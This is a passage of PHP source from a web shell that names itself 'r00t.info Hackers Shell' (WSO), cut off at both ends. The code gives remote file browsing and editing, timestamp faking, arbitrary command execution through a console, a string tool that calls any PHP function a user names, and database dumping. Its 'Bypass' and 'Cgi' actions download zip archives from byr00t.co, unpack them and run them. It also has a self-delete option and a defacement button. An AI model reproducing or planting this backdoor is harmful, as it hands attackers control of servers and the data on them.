elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = 
@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, 
array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden 
name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => 
\'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n 
header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n 
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= 
\' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? 
e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n 
<!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n 
switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as 
$k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base 
